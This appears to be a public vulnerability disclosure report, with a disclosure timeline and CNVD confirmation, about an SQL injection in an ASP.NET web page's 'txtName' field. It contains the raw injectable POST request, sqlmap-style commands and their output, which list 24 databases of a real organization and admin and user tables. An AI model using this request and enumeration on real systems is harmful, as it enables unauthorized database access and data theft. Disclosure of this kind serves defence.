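2016-01-02: Details reported to the vendor; awaiting vendor handling
2016-01-08: Vendor has confirmed; details disclosed to the vendor only
2016-01-18: Details disclosed to core white hats and experts in related fields
2016-01-28: Details disclosed to regular white hats
2016-02-07: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public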
As the title says.
POST /WebPage/index.aspx?menu=menu1 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/WebPage/index.aspx?menu=menu1
Cookie: ASP.NET_SessionId=bzriqxd1oowjiql3usqq3iij
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3389

__VIEWSTATE=[value omitted]&__VIEWSTATEGENERATOR=0E6ECABE&__EVENTVALIDATION=[value omitted]&Head1%24hidMenu=menu1&ddlType=&ddlWorkPlace=&txtName=%25&Button2=

-r f:\k.txt -p txtName

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008

-r f:\k.txt --dbs

available databases [24]:
[*] Lottery20y
[*] lotteryoppeinc
[*] master
[*] MemberLottery
[*] model
[*] msdb
[*] ocmap_zs
[*] OpDesign
[*] OpGrandPrix2011
[*] OppeinData
[*] OppeinGeneral
[*] OppeinPoint2012
[*] OpRecruitment
[*] Optima2009
[*] OptimaBBS2009
[*] OptimaLottery
[*] optimavoteweb
[*] OpWYDesign
[*] OPZPWeb
[*] PonderWAF
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] vote

-r f:\k.txt --tables

Current database
[5 tables]
+--------------------+
| dbo.admin          |
| dbo.news           |
| dbo.sysconstraints |
| dbo.sysusers       |
| dbo.users          |
+--------------------+
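Fix
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2016-01-08 21:12
CNVD has confirmed the vulnerability as described. No direct handling channel with the organization that manages the website has been established yet; the report is pending claim.
None yet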